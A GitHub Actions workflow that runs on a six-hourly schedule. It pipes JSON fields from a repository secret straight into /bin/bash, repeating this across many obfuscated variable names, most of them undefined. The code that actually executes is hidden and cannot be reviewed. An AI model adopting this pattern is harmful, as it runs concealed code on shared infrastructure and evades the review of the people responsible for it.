name: jiankonshig
on:
  workflow_dispatch:
  schedule:
    - cron: '11 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: jiankonshig
        env:
          hwgvw53: ${{ secrets.hwgvw53 }}
        run: |
          echo $hwgvw53 | jq -r .xsw100 | /bin/bash
          echo $zuxu46 | jq -r .e966 | /bin/bash
          echo $goh3 | jq -r .g65 | /bin/bash
          echo $zkhp89913 | jq -r .eidb34 | /bin/bash
          echo $m50206 | jq -r .mx52 | /bin/bash
          echo $w773 | jq -r .mta1121 | /bin/bash
          echo $b07 | jq -r .huh4 | /bin/bash
          echo $xw98 | jq -r .cg52379 | /bin/bash
          echo $ey1 | jq -r .sxxz9986 | /bin/bash
          echo $iftd03 | jq -r .ds4 | /bin/bash
          echo $oef64999 | jq -r .vanqx338 | /bin/bash
          echo $rere12700 | jq -r .ny99978 | /bin/bash
          echo $wopui78 | jq -r .a00970 | /bin/bash
          echo $wxw54 | jq -r .s31 | /bin/bash
          echo $vruh45140 | jq -r .aiypn7313 | /bin/bash
          echo $fptd8 | jq -r .uxr37223 | /bin/bash
          echo $xym258 | jq -r .ffzkm3508 | /bin/bash

